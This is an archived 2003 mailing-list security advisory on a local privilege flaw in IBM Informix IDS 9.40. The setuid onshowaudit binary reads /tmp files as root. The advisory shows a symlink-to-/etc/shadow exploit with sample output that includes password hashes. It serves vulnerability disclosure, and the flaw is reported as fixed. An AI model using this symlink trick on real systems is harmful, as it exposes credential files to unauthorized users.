lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <Pine.LNX.4.44.0401271531590.2544-100000@hades2.concha.upv.es>
From: pask at open3s.com (pask@...n3s.com)
Subject: OPEN3S-2003-08-08-eng-informix-onshowaudit


       ----------========== OPEN3S-2003-08-08-eng-informix-onshowaudit ==========----------

 Title:    Local Vulnerability in IBM Informix IDS v9.40 onshowaudit binary
 Date:     08-08-2003
 Platform: Only tested in Linux but can be exported to others.
 Impact:   Users with exec perm over ./bin/onshowaudit can read  
	   all system files.
 Author:   Juan Manuel Pascual Escriba <pask@...n3s.com>
 Status:   Solved by IBM Corp


PROBLEM SUMMARY:

Informix user or any user with AAO privileges can execute onshowaudit. This binary 
is owned by root.informix with 6755 permision. As the endly point of its execution 
thread onshowaudit try to read some files in /tmp directory without dropping any 
privileges.

It's easy for an intruder to make a link to /etc/shadow or /root/.ssh/authorized_keys 
of one of this files and read this files.


DESCRIPTION

Informix user or any user with AAO privileges an execute onshowaudit. This binary
is owned by root.informix with 6755 permision. As the endly point of its execution
thread onshowaudit reads

16231 open("/tmp/.0", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
16231 open("/tmp/.1", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
16231 open("/tmp/.2", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
....
16231 open("/tmp/.97", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
16231 open("/tmp/.98", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
16231 write(2, "Cannot open file \n", 18) = 18

without dropping privileges. It's easy to make a link:

[informix@...oni tmp]$ ls -alc /etc/shadow
-r--------    1 root     root         1020 Aug 10 01:59 /etc/shadow
[informix@...oni tmp]$ ln -s /etc/shadow .0
informix@...oni tmp]$ /home/informix-9.40/bin/onshowaudit

wait for the output
....
aaa:!!:11635:0:99999:7:::
pask:$1$4xnwc%eu$DfkZv8cTe6wywzom0:11938:0:99999:7:::
bbb:!!:11636:0:99999:7:::
cccc:!!:11636:0:99999:7:::
ddddd:!!:11647:0:99999:7:::
aaaaaa:!!:11806:0:99999:7:::
wwwwww:!!:11833:0:99999:7:::
zzz:!!:12027:0:99999:7:::
informix:$1$G8jXuut9eWsIiDsgwQb1KcPcfA/:12272:0:99999:7:::

Program Over.


IMPACT:

Any user with AAO privileges over onshowaudit could read any system file. 



STATUS 

Reported to IBM security team at 11th of August 2003

See more infomartion about this vulnerability and workaround at:
http://www-1.ibm.com/support/docview.wss?uid=swg21153336

This vulnerability was managed in an efficient manner by Jonathan Leffler
from IBM Informix Database Engineering Team.


--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask@...n3s.com
Barcelona - Spain                      http://www.open3s.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ